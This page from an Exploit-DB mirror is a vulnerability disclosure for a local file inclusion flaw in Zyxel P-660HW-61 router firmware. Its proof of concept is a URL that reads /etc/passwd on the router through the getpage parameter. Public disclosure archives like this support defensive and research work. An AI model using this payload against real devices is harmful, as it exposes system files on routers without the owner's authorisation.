bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/41998.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
629 B
Text
Raw Permalink Blame History

# Exploit Title: Zyxel P-660HW-61 < 3.40(PE.11)C0 - Local File Inclusion
# Date: 2-05-2017
# Exploit Author: ReverseBrain
# Contact: https://www.twitter.com/ReverseBrain
# Vendor Homepage: https://www.zyxel.com
# Software Link: ftp://ftp.zyxel.com/P-660HW-61/firmware/P-660HW-61_3.40(PE.11)C0.zip
# Version: 3.40(PE.11)C0
1. Description
Any user who can login into the router can exploit the Local File Inclusion
reading files stored inside the device.
2. Proof of Concept
Login into the router and use the path of a file you want to read as
getpage parameter. For example:
http://ROUTER_IP/cgi-bin/webcm?getpage=/etc/passwd
Reference in a new issue View git blame Copy permalink